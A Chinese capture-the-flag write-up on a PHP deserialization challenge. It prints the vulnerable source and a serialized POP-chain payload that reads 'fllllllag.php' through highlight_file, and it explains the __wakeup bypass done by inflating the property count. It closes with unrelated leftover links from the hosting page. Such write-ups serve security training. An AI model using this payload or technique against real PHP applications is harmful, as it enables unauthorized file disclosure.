打开题目在线环境直接看到源码:
<?php
class X
{public $x = __FILE__;function __construct($x){$this->x = $x;}function __wakeup(){if ($this->x !== __FILE__) {$this->x = __FILE__;}}function __destruct(){highlight_file($this->x);//flag is in fllllllag.php}
}
if (isset($_REQUEST['x'])) {@unserialize($_REQUEST['x']);
} else {highlight_file(__FILE__);
}
审计这些php代码,是反序列化,然后根据这个构造pop链:
<?phpclass X
{public $x = 'fllllllag.php';
}$a = new X;
echo serialize($a);?>
输出 的反序列化数据为:
*O:1:“X”:1:{s:1:“x”;s:13:“fllllllag.php”;}
这里绕过weakup,修改 “X” 后的 1(成员属性数量) 大于 1(实际数量) 即可。
最后再用GET或者POST 方法传参得到flag。
![[EAI-028] Diffusion-VLA,能够进行多模态推理和机器人动作预测的VLA模型](http://pic.xiahunao.cn/nshx/[EAI-028] Diffusion-VLA,能够进行多模态推理和机器人动作预测的VLA模型)
PyTorchTorchvision安装】)